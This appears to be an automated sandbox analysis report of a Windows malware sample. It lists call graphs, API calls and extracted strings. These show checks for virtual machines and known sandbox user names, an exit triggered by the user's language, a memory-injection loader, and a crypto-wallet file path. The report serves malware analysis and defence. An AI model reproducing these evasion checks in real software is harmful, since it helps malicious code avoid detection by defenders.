___free_lconv_mon 14 API calls 12595->12597 12599 f0ac83 12595->12599 12596->12595 12597->12599 12598 f0ac95 12601 f08d42 ___free_lconv_mon 14 API calls 12598->12601 12598->12602 12599->12598 12600 f08d42 ___free_lconv_mon 14 API calls 12599->12600 12600->12598 12601->12602 12602->12555 12604 f0acb8 12603->12604 12614 f0ad10 12603->12614 12605 f0acc8 12604->12605 12607 f08d42 ___free_lconv_mon 14 API calls 12604->12607 12606 f0acda 12605->12606 12608 f08d42 ___free_lconv_mon 14 API calls 12605->12608 12609 f08d42 ___free_lconv_mon 14 API calls 12606->12609 12611 f0acec 12606->12611 12607->12605 12608->12606 12609->12611 12610 f0acfe 12613 f08d42 ___free_lconv_mon 14 API calls 12610->12613 12610->12614 12611->12610 12612 f08d42 ___free_lconv_mon 14 API calls 12611->12612 12612->12610 12613->12614 12614->12574 12616 f0b187 12615->12616 12617 f0b1a6 12615->12617 12616->12617 12621 f0ad39 12616->12621 12617->12568 12620 f08d42 ___free_lconv_mon 14 API calls 12620->12617 12622 f0ae17 12621->12622 12623 f0ad4a 12621->12623 12622->12620 12657 f0ad14 12623->12657 12626 f0ad14 _unexpected 14 API calls 12627 f0ad5d 12626->12627 12628 f0ad14 _unexpected 14 API calls 12627->12628 12629 f0ad68 12628->12629 12630 f0ad14 _unexpected 14 API calls 12629->12630 12631 f0ad73 12630->12631 12632 f0ad14 _unexpected 14 API calls 12631->12632 12633 f0ad81 12632->12633 12634 f08d42 ___free_lconv_mon 14 API calls 12633->12634 12635 f0ad8c 12634->12635 12636 f08d42 ___free_lconv_mon 14 API calls 12635->12636 12637 f0ad97 12636->12637 12638 f08d42 ___free_lconv_mon 14 API calls 12637->12638 12639 f0ada2 12638->12639 12640 f0ad14 _unexpected 14 API calls 12639->12640 12641 f0adb0 12640->12641 12642 f0ad14 _unexpected 14 API calls 12641->12642 12643 f0adbe 12642->12643 12644 f0ad14 _unexpected 14 API calls 12643->12644 12645 f0adcf 12644->12645 12646 f0ad14 _unexpected 14 API calls 12645->12646 12647 f0addd 12646->12647 12648 f0ad14 _unexpected 14 API calls 12647->12648 12649 f0adeb 12648->12649 12650 f08d42 ___free_lconv_mon 14 API calls 12649->12650 12651 f0adf6 12650->12651 12652 f08d42 ___free_lconv_mon 14 API calls 12651->12652 12653 f0ae01 12652->12653 12654 f08d42 ___free_lconv_mon 14 API calls 12653->12654 12655 f0ae0c 12654->12655 12656 f08d42 ___free_lconv_mon 14 API calls 12655->12656 12656->12622 12658 f0ad26 12657->12658 12659 f0ad35 12658->12659 12660 f08d42 ___free_lconv_mon 14 API calls 12658->12660 12659->12626 12660->12658 12661->12546 12701 f0b82d 12662->12701 12665 f0b944 12668 f0b950 ___scrt_is_nonwritable_in_current_image 12665->12668 12666 f0920b CallUnexpected 14 API calls 12675 f0b981 CallUnexpected 12666->12675 12667 f0b9a0 12671 f0964a ___free_lconv_mon 14 API calls 12667->12671 12668->12666 12668->12667 12670 f0b9b2 CallUnexpected 12668->12670 12668->12675 12669 f0b98a 12669->12423 12672 f0b9e8 CallUnexpected 12670->12672 12712 f09434 EnterCriticalSection 12670->12712 12673 f0b9a5 12671->12673 12678 f0bb22 12672->12678 12679 f0ba25 12672->12679 12689 f0ba53 12672->12689 12676 f078c7 CallUnexpected 39 API calls 12673->12676 12675->12667 12675->12669 12675->12670 12676->12669 12684 f0bb2d 12678->12684 12717 f0947c LeaveCriticalSection 12678->12717 12683 f090ba _unexpected 39 API calls 12679->12683 12679->12689 12681 f08498 CallUnexpected 21 API calls 12685 f0bb35 12681->12685 12687 f0ba48 12683->12687 12684->12681 12686 f090ba _unexpected 39 API calls 12690 f0baa8 12686->12690 12688 f090ba _unexpected 39 API calls 12687->12688 12688->12689 12713 f0bace 12689->12713 12690->12669 12691 f090ba _unexpected 39 API calls 12690->12691 12691->12669 12693 f076e7 CallUnexpected 12692->12693 12694 f07713 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12693->12694 12697 f077e4 CallUnexpected 12694->12697 12695 f04704 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12696 f07802 12695->12696 12696->12425 12697->12695 12719 f07813 12698->12719 12702 f0b839 ___scrt_is_nonwritable_in_current_image 12701->12702 12707 f09434 EnterCriticalSection 12702->12707 12704 f0b847 12708 f0b889 12704->12708 12707->12704 12711 f0947c LeaveCriticalSection 12708->12711 12710 f08b84 12710->12423 12710->12665 12711->12710 12712->12672 12714 f0bad2 12713->12714 12715 f0ba9a 12713->12715 12718 f0947c LeaveCriticalSection 12714->12718 12715->12669 12715->12686 12715->12690 12717->12684 12718->12715 12720 f07825 _Allocate 12719->12720 12725 f0784a 12720->12725 12722 f0783d 12736 f07603 12722->12736 12726 f0785a 12725->12726 12728 f07861 12725->12728 12742 f07668 GetLastError 12726->12742 12733 f0786f 12728->12733 12746 f0763f 12728->12746 12730 f07896 12730->12733 12749 f078f4 IsProcessorFeaturePresent 12730->12749 12732 f078c6 12734 f07813 _Allocate 39 API calls 12732->12734 12733->12722 12735 f078d3 12734->12735 12735->12722 12737 f0760f 12736->12737 12738 f07626 12737->12738 12775 f076ae 12737->12775 12740 f07639 12738->12740 12741 f076ae _Allocate 39 API calls 12738->12741 12740->12434 12741->12740 12743 f07681 12742->12743 12753 f092bc 12743->12753 12747 f07663 12746->12747 12748 f0764a GetLastError SetLastError 12746->12748 12747->12730 12748->12730 12750 f07900 12749->12750 12751 f076cb CallUnexpected 8 API calls 12750->12751 12752 f07915 GetCurrentProcess TerminateProcess 12751->12752 12752->12732 12754 f092d5 12753->12754 12755 f092cf 12753->12755 12757 f0b5a7 _unexpected 6 API calls 12754->12757 12761 f07699 SetLastError 12754->12761 12756 f0b568 _unexpected 6 API calls 12755->12756 12756->12754 12758 f092ef 12757->12758 12759 f0965d _unexpected 14 API calls 12758->12759 12758->12761 12760 f092ff 12759->12760 12762 f09307 12760->12762 12763 f0931c 12760->12763 12761->12728 12764 f0b5a7 _unexpected 6 API calls 12762->12764 12765 f0b5a7 _unexpected 6 API calls 12763->12765 12766 f09313 12764->12766 12767 f09328 12765->12767 12770 f08d42 ___free_lconv_mon 14 API calls 12766->12770 12768 f0933b 12767->12768 12769 f0932c 12767->12769 12772 f08ee8 _unexpected 14 API calls 12768->12772 12771 f0b5a7 _unexpected 6 API calls 12769->12771 12770->12761 12771->12766 12773 f09346 12772->12773 12774 f08d42 ___free_lconv_mon 14 API calls 12773->12774 12774->12761 12776 f076c1 12775->12776 12777 f076b8 12775->12777 12776->12738 12778 f07668 _Allocate 16 API calls 12777->12778 12779 f076bd 12778->12779 12779->12776 12780 f08b7f CallUnexpected 39 API calls 12779->12780 12781 f076ca 12780->12781 12783 f08335 12782->12783 12791 f08346 12782->12791 12785 f04fd4 CallUnexpected GetModuleHandleW 12783->12785 12787 f0833a 12785->12787 12787->12791 12793 f083e9 GetModuleHandleExW 12787->12793 12788 f08384 12788->11635 12798 f081d3 12791->12798 12794 f08428 GetProcAddress 12793->12794 12795 f0843c 12793->12795 12794->12795 12796 f08458 12795->12796 12797 f0844f FreeLibrary 12795->12797 12796->12791 12797->12796 12799 f081df ___scrt_is_nonwritable_in_current_image 12798->12799 12813 f09434 EnterCriticalSection 12799->12813 12801 f081e9 12814 f08220 12801->12814 12803 f081f6 12818 f08214 12803->12818 12806 f0839f 12843 f083d0 12806->12843 12808 f083a9 12809 f083bd 12808->12809 12810 f083ad GetCurrentProcess TerminateProcess 12808->12810 12811 f083e9 CallUnexpected 3 API calls 12809->12811 12810->12809 12812 f083c5 ExitProcess 12811->12812 12813->12801 12815 f0822c ___scrt_is_nonwritable_in_current_image CallUnexpected 12814->12815 12816 f08290 CallUnexpected 12815->12816 12821 f0890d 12815->12821 12816->12803 12842 f0947c LeaveCriticalSection 12818->12842 12820 f08202 12820->12788 12820->12806 12822 f08919 __EH_prolog3 12821->12822 12825 f08665 12822->12825 12824 f08940 CallUnexpected 12824->12816 12826 f08671 ___scrt_is_nonwritable_in_current_image 12825->12826 12833 f09434 EnterCriticalSection 12826->12833 12828 f0867f 12834 f0881d 12828->12834 12833->12828 12835 f0868c 12834->12835 12836 f0883c 12834->12836 12838 f086b4 12835->12838 12836->12835 12837 f08d42 ___free_lconv_mon 14 API calls 12836->12837 12837->12835 12841 f0947c LeaveCriticalSection 12838->12841 12840 f0869d 12840->12824 12841->12840 12842->12820 12846 f0a6ef 12843->12846 12845 f083d5 CallUnexpected 12845->12808 12847 f0a6fe CallUnexpected 12846->12847 12848 f0a70b 12847->12848 12850 f0b4aa 12847->12850 12848->12845 12851 f0b425 _unexpected 5 API calls 12850->12851 12852 f0b4c6 12851->12852 12852->12848 12854 f08abf 12853->12854 12856 f08ad1 ___scrt_uninitialize_crt 12853->12856 12855 f08acd 12854->12855 12858 f0bddd 12854->12858 12855->11678 12856->11678 12861 f0bc6e 12858->12861 12864 f0bbc2 12861->12864 12865 f0bbce ___scrt_is_nonwritable_in_current_image 12864->12865 12872 f09434 EnterCriticalSection 12865->12872 12867 f0bc44 12881 f0bc62 12867->12881 12870 f0bbd8 ___scrt_uninitialize_crt 12870->12867 12873 f0bb36 12870->12873 12872->12870 12874 f0bb42 ___scrt_is_nonwritable_in_current_image 12873->12874 12884 f0befa EnterCriticalSection 12874->12884 12876 f0bb4c ___scrt_uninitialize_crt 12877 f0bb98 12876->12877 12885 f0bd78 12876->12885 12898 f0bbb6 12877->12898 13000 f0947c LeaveCriticalSection 12881->13000 12883 f0bc50 12883->12855 12884->12876 12886 f0bd8d _Allocate 12885->12886 12887 f0bd94 12886->12887 12888 f0bd9f 12886->12888 12889 f0bc6e ___scrt_uninitialize_crt 68 API calls 12887->12889 12901 f0bd0f 12888->12901 12897 f0bd9a 12889->12897 12892 f07603 _Allocate 39 API calls 12894 f0bdd7 12892->12894 12894->12877 12895 f0bdc0 12914 f0cf00 12895->12914 12897->12892 12999 f0bf0e LeaveCriticalSection 12898->12999 12900 f0bba4 12900->12870 12902 f0bd28 12901->12902 12906 f0bd4f 12901->12906 12903 f0c557 ___scrt_uninitialize_crt 39 API calls 12902->12903 12902->12906 12904 f0bd44 12903->12904 12925 f0d71f 12904->12925 12906->12897 12907 f0c557 12906->12907 12908 f0c563 12907->12908 12909 f0c578 12907->12909 12910 f0964a ___free_lconv_mon 14 API calls 12908->12910 12909->12895 12911 f0c568 12910->12911 12912 f078c7 CallUnexpected 39 API calls 12911->12912 12913 f0c573 12912->12913 12913->12895 12915 f0cf11 12914->12915 12916 f0cf1e 12914->12916 12917 f0964a ___free_lconv_mon 14 API calls 12915->12917 12918 f0cf67 12916->12918 12920 f0cf45 12916->12920 12924 f0cf16 12917->12924 12919 f0964a ___free_lconv_mon 14 API calls 12918->12919 12921 f0cf6c 12919->12921 12966 f0ce5e 12920->12966 12923 f078c7 CallUnexpected 39 API calls 12921->12923 12923->12924 12924->12897 12926 f0d72b ___scrt_is_nonwritable_in_current_image 12925->12926 12927 f0d76c 12926->12927 12929 f0d7b2 12926->12929 12935 f0d733 12926->12935 12928 f0784a _Allocate 39 API calls 12927->12928 12928->12935 12936 f0a864 EnterCriticalSection 12929->12936 12931 f0d7b8 12932 f0d7d6 12931->12932 12937 f0d830 12931->12937 12963 f0d828 12932->12963 12935->12906 12936->12931 12938 f0d858 12937->12938 12960 f0d87b ___scrt_uninitialize_crt 12937->12960 12939 f0d85c 12938->12939 12941 f0d8b7 12938->12941 12940 f0784a _Allocate 39 API calls 12939->12940 12940->12960 12942 f0ded4 ___scrt_uninitialize_crt 41 API calls 12941->12942 12944 f0d8d5 12941->12944 12942->12944 12943 f0d3ac ___scrt_uninitialize_crt 40 API calls 12945 f0d8e7 12943->12945 12944->12943 12946 f0d934 12945->12946 12947 f0d8ed 12945->12947 12948 f0d948 12946->12948 12949 f0d99d WriteFile 12946->12949 12950 f0d8f5 12947->12950 12951 f0d91c 12947->12951 12954 f0d950 12948->12954 12955 f0d989 12948->12955 12952 f0d9bf GetLastError 12949->12952 12949->12960 12958 f0d344 ___scrt_uninitialize_crt 6 API calls 12950->12958 12950->12960 12953 f0cf7d ___scrt_uninitialize_crt 45 API calls 12951->12953 12952->12960 12953->12960 12956 f0d975 12954->12956 12957 f0d955 12954->12957 12959 f0d429 ___scrt_uninitialize_crt 7 API calls 12955->12959 12961 f0d5ed ___scrt_uninitialize_crt 8 API calls 12956->12961 12957->12960 12962 f0d504 ___scrt_uninitialize_crt 7 API calls 12957->12962 12958->12960 12959->12960 12960->12932 12961->12960 12962->12960 12964 f0a887 ___scrt_uninitialize_crt LeaveCriticalSection 12963->12964 12965 f0d82e 12964->12965 12965->12935 12967 f0ce6a ___scrt_is_nonwritable_in_current_image 12966->12967 12979 f0a864 EnterCriticalSection 12967->12979 12969 f0ce79 12970 f0cebe 12969->12970 12980 f0a93b 12969->12980 12972 f0964a ___free_lconv_mon 14 API calls 12970->12972 12974 f0cec5 12972->12974 12973 f0cea5 FlushFileBuffers 12973->12974 12975 f0ceb1 GetLastError 12973->12975 12996 f0cef4 12974->12996 12993 f09637 12975->12993 12979->12969 12981 f0a948 12980->12981 12983 f0a95d 12980->12983 12982 f09637 ___scrt_uninitialize_crt 14 API calls 12981->12982 12985 f0a94d 12982->12985 12984 f09637 ___scrt_uninitialize_crt 14 API calls 12983->12984 12987 f0a982 12983->12987 12988 f0a98d 12984->12988 12986 f0964a ___free_lconv_mon 14 API calls 12985->12986 12989 f0a955 12986->12989 12987->12973 12990 f0964a ___free_lconv_mon 14 API calls 12988->12990 12989->12973 12991 f0a995 12990->12991 12992 f078c7 CallUnexpected 39 API calls 12991->12992 12992->12989 12994 f0920b CallUnexpected 14 API calls 12993->12994 12995 f0963c 12994->12995 12995->12970 12997 f0a887 ___scrt_uninitialize_crt LeaveCriticalSection 12996->12997 12998 f0cedd 12997->12998 12998->12924 12999->12900 13000->12883

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 5e89f0-5e8a00 call 5e9750 3 5e8a02-5e8a10 0->3 3->3 4 5e8a12-5e8a38 EnumDisplayDevicesW 3->4 5 5e8aaa-5e8ade GetModuleHandleA GetProcAddress * 2 4->5 6 5e8a3a 4->6 8 5e8ae6-5e8b24 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->8 9 5e8ae0-5e8ae3 5->9 7 5e8a40-5e8a51 StrStrIW 6->7 10 5e8a57-5e8a67 StrStrIW 7->10 11 5e8b45-5e8b4d 7->11 12 5e8b4e-5e8b50 8->12 13 5e8b26-5e8b28 8->13 9->8 10->11 16 5e8a6d-5e8a7d StrStrIW 10->16 14 5e8b57-5e8ba4 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 12->14 15 5e8b52 12->15 13->12 17 5e8b2a-5e8b36 GetFileAttributesW 13->17 19 5e8baa-5e8bd2 14->19 20 5e8ba6-5e8ba8 14->20 15->14 16->11 18 5e8a83-5e8a93 StrStrIW 16->18 17->12 21 5e8b38-5e8b3a 17->21 18->11 22 5e8a99-5e8aa8 EnumDisplayDevicesW 18->22 23 5e8bd5-5e8bfb PathCombineW GetFileAttributesW 19->23 20->11 20->19 21->12 24 5e8b3c-5e8b3e 21->24 22->5 22->7 25 5e8bfd-5e8bff 23->25 26 5e8c05 23->26 24->11 27 5e8b40 24->27 25->26 28 5e8c01-5e8c03 25->28 29 5e8c07-5e8c17 26->29 27->11 28->29 29->23 30 5e8c19-5e8c22 29->30 30->11 31 5e8c28-5e8c6a PathCombineW * 2 GetFileAttributesW 30->31 32 5e8dee-5e8e13 PathCombineW GetFileAttributesW 31->32 33 5e8c70-5e8c72 31->33 35 5e8ed9-5e8efc ExpandEnvironmentStringsW GetFileAttributesW 32->35 36 5e8e19-5e8e1b 32->36 33->32 34 5e8c78-5e8c84 GetFileAttributesW 33->34 34->32 37 5e8c8a-5e8c8c 34->37 39 5e8efe-5e8f00 35->39 40 5e8f06 35->40 36->35 38 5e8e21-5e8e4d CreateFileW 36->38 37->32 42 5e8c92-5e8ccb CreateFileW 37->42 44 5e8e4f-5e8e6e GetFileSize GetProcessHeap HeapAlloc 38->44 45 5e8e92-5e8e9a 38->45 39->40 41 5e8f02-5e8f04 39->41 43 5e8f08-5e8f0a 40->43 41->43 46 5e8d0e-5e8d33 CreateFileW 42->46 47 5e8ccd-5e8cee GetFileSize GetProcessHeap HeapAlloc 42->47 48 5e8f0c-5e8f21 GetFileAttributesExW 43->48 49 5e8f2d-5e8fa7 GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 43->49 50 5e8e89-5e8e8c CloseHandle 44->50 51 5e8e70-5e8e86 ReadFile 44->51 52 5e8e9c-5e8eb8 lstrcmpA 45->52 53 5e8ebb-5e8ebd 45->53 58 5e8d78-5e8d80 46->58 59 5e8d35-5e8d54 GetFileSize GetProcessHeap HeapAlloc 46->59 54 5e8d07-5e8d08 CloseHandle 47->54 55 5e8cf0-5e8d04 ReadFile 47->55 48->49 56 5e8f23-5e8f27 48->56 57 5e8fb0-5e8fc2 lstrcmpW 49->57 50->45 51->50 52->53 60 5e8ecf-5e8ed3 53->60 61 5e8ebf-5e8ec9 GetProcessHeap HeapFree 53->61 54->46 55->54 56->11 56->49 57->11 62 5e8fc8-5e8fcd 57->62 65 5e8db9-5e8dbe 58->65 66 5e8d82-5e8d86 58->66 63 5e8d6f-5e8d72 CloseHandle 59->63 64 5e8d56-5e8d6c ReadFile 59->64 60->11 60->35 61->60 62->57 67 5e8fcf-5e8fe3 StrStrW 62->67 63->58 64->63 69 5e8dd0-5e8dd2 65->69 70 5e8dc0-5e8dca GetProcessHeap HeapFree 65->70 66->65 68 5e8d88-5e8d98 lstrcmpA 66->68 67->11 73 5e8fe9-5e8ff9 lstrcmpW 67->73 68->65 74 5e8d9a-5e8db6 lstrcmpA 68->74 71 5e8de4-5e8de8 69->71 72 5e8dd4-5e8dde GetProcessHeap HeapFree 69->72 70->69 71->11 71->32 72->71 75 5e900e-5e901e 73->75 76 5e8ffb-5e9008 lstrcmpW 73->76 74->65 77 5e9025-5e9034 lstrcmpW 75->77 76->11 76->75 77->11 78 5e903a-5e903f 77->78 78->77 79 5e9041-5e906e GlobalMemoryStatusEx 78->79 79->11 80 5e9074-5e9084 lstrcmpW 79->80 81 5e9086-5e9093 lstrcmpW 80->81 82 5e90a1-5e90a8 80->82 81->82 83 5e9095-5e909b 81->83 84 5e90aa-5e90b1 82->84 85 5e90e5-5e90fe PathCombineW 82->85 83->11 83->82 84->85 86 5e90b3-5e90b9 84->86 87 5e9100-5e910e 85->87 86->85 88 5e90bb-5e90cb lstrcmpW 86->88 87->87 89 5e9110-5e912a FindFirstFileW 87->89 88->85 90 5e90cd-5e90d1 88->90 91 5e9222-5e924f GetModuleFileNameW StrStrIW 89->91 92 5e9130-5e9137 89->92 90->85 93 5e90d3-5e90da 90->93 94 5e9140-5e9150 lstrcmpW 92->94 93->93 95 5e90dc-5e90df 93->95 96 5e9156-5e9166 lstrcmpW 94->96 97 5e91f4-5e9204 FindNextFileW 94->97 95->11 95->85 96->97 99 5e916c-5e917e 96->99 97->94 98 5e920a-5e921c FindClose 97->98 98->11 98->91 100 5e9197-5e91a9 lstrcmpW 99->100 101 5e9180-5e9195 99->101 102 5e91cf-5e91e0 100->102 103 5e91ab-5e91b5 lstrcmpW 100->103 101->100 101->101 102->97 105 5e91e2-5e91e9 102->105 103->102 104 5e91b7-5e91c1 lstrcmpW 103->104 104->102 106 5e91c3-5e91cd lstrcmpW 104->106 105->97 107 5e91eb-5e91ef 105->107 106->102 108 5e91f1 106->108 107->97 108->97
                      APIs
                      • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005E8A2E
                      • StrStrIW.KERNELBASE(?,Hyper-V), ref: 005E8A4D
                      • StrStrIW.SHLWAPI(?,VMWare), ref: 005E8A63
                      • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005E8A79
                      • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005E8A8F
                      • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005E8AA4
                      • GetModuleHandleA.KERNEL32(kernel32), ref: 005E8AAF
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E8AC3
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E8ACE
                      • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005E8AFD
                      • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005E8B10
                      • GetFileAttributesW.KERNELBASE(?), ref: 005E8B1F
                      • GetFileAttributesW.KERNEL32(?), ref: 005E8B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
                      • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$` ^| ^$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
                      • API String ID: 4266617301-1374900837
                      • Opcode ID: 1854b5f228053f7880674e521978d663c31b010468876a506daebe7090a937b0
                      • Instruction ID: 70fbfa9cfb1bf5f24e916b926b8ac3331e79e28cad9c1783a974814be3f58035
                      • Opcode Fuzzy Hash: 1854b5f228053f7880674e521978d663c31b010468876a506daebe7090a937b0
                      • Instruction Fuzzy Hash: 2A32817190029DAAEF289BA68C8CFEF7BBCBF04711F000555E598E7190EB749A49CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 109 f01300-f01350 GetModuleHandleA VirtualAlloc 110 f01352-f01354 109->110 111 f01359-f01387 call f06fe0 109->111 112 f016a6-f016b3 call f04704 110->112 116 f01395-f013a2 111->116 118 f013e1-f013f9 116->118 119 f013a4-f013df call f06fe0 116->119 121 f014ef-f01528 call f011f0 VirtualProtect 118->121 122 f013ff-f01406 118->122 119->116 130 f01536-f01543 121->130 122->121 125 f0140c-f01417 122->125 128 f01422-f01429 125->128 128->121 129 f0142f-f01463 GetModuleHandleA GetProcAddress LoadLibraryA 128->129 133 f01469-f01486 129->133 134 f014ea 129->134 131 f01549-f01571 130->131 132 f0164a-f01663 130->132 137 f01593-f015ad 131->137 138 f01573-f01591 VirtualFree 131->138 135 f016a3 132->135 136 f01665-f01679 132->136 139 f01488-f0148b 133->139 140 f0148e 133->140 134->128 135->112 142 f01684-f01688 136->142 144 f015b8 137->144 145 f015af-f015b6 137->145 143 f0152a-f01532 138->143 139->140 146 f014a2-f014a8 140->146 142->135 147 f0168a-f01690 142->147 143->130 148 f015bf-f015c7 144->148 145->148 146->134 149 f014aa-f014b5 146->149 147->135 150 f01692-f016a1 147->150 151 f015d2 148->151 152 f015c9-f015d0 148->152 153 f014c6-f014d2 149->153 154 f014b7-f014c4 149->154 150->142 155 f015d9-f015e2 151->155 152->155 156 f014d5-f014e8 GetProcAddress 153->156 154->156 158 f015e4-f015eb 155->158 159 f015ed 155->159 160 f01490-f0149f 156->160 162 f015f4-f01616 158->162 159->162 160->146 163 f01624-f0163f VirtualProtect 162->163 164 f01618-f01621 162->164 163->132 164->163
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32), ref: 00F0132A
                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00F01343
                      • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00F01439
                      • GetProcAddress.KERNEL32(00000000), ref: 00F01440
                      • LoadLibraryA.KERNELBASE(?), ref: 00F01459
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
                      • String ID: LoadLibraryA$kernel32
                      • API String ID: 3393750808-970291620
                      • Opcode ID: cc2036450d0d5350381c60572e568b0521c2fbf5e3e0af88fab6c747bce8151e
                      • Instruction ID: 8acf004c47e9b113821c71c42e4783ad6b73af3793d277568167c4bd2a77d245
                      • Opcode Fuzzy Hash: cc2036450d0d5350381c60572e568b0521c2fbf5e3e0af88fab6c747bce8151e
                      • Instruction Fuzzy Hash: AED1E575E00219DFCB18CF98D894AFEB7B6FF88304F248159E406AB395D735A981EB50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 177 5e9250-5e9267 GetUserDefaultLangID 178 5e92fc-5e92fe ExitProcess 177->178 179 5e926d-5e9275 177->179 179->178 180 5e927b-5e9283 179->180 180->178 181 5e9285-5e928d 180->181 181->178 182 5e928f-5e9297 181->182 182->178 183 5e9299-5e92a1 182->183 183->178 184 5e92a3-5e92ab 183->184 184->178 185 5e92ad-5e92b5 184->185 185->178 186 5e92b7-5e92bf 185->186 186->178 187 5e92c1-5e92c9 186->187 187->178 188 5e92cb-5e92d3 187->188 188->178 189 5e92d5 call 5e89f0 188->189 191 5e92da-5e92dc 189->191 191->178 192 5e92de-5e92f7 call 5e8710 call 5e72e0 call 5e93b0 call 5e7920 call 5e8900 191->192 192->178
                      APIs
                      • GetUserDefaultLangID.KERNEL32 ref: 005E9256
                      • ExitProcess.KERNEL32 ref: 005E92FE
                        • Part of subcall function 005E89F0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005E8A2E
                        • Part of subcall function 005E89F0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 005E8A4D
                        • Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,VMWare), ref: 005E8A63
                        • Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005E8A79
                        • Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005E8A8F
                        • Part of subcall function 005E89F0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005E8AA4
                        • Part of subcall function 005E89F0: GetModuleHandleA.KERNEL32(kernel32), ref: 005E8AAF
                        • Part of subcall function 005E89F0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E8AC3
                        • Part of subcall function 005E89F0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E8ACE
                        • Part of subcall function 005E89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005E8AFD
                        • Part of subcall function 005E89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005E8B10
                        • Part of subcall function 005E89F0: GetFileAttributesW.KERNELBASE(?), ref: 005E8B1F
                        • Part of subcall function 005E89F0: GetFileAttributesW.KERNEL32(?), ref: 005E8B31
                        • Part of subcall function 005E8710: InitializeCriticalSection.KERNEL32(005EA088), ref: 005E8732
                        • Part of subcall function 005E8710: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005E875F
                        • Part of subcall function 005E8710: StringFromGUID2.OLE32(?,?,00000080), ref: 005E87B8
                        • Part of subcall function 005E8710: wsprintfA.USER32 ref: 005E87CF
                        • Part of subcall function 005E8710: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005E87E3
                        • Part of subcall function 005E8710: GetLastError.KERNEL32 ref: 005E87EE
                        • Part of subcall function 005E8710: WSAStartup.WS2_32(00000202,?), ref: 005E882C
                        • Part of subcall function 005E8710: CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005E8845
                        • Part of subcall function 005E8710: CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005E8861
                        • Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,005E92E8), ref: 005E7306
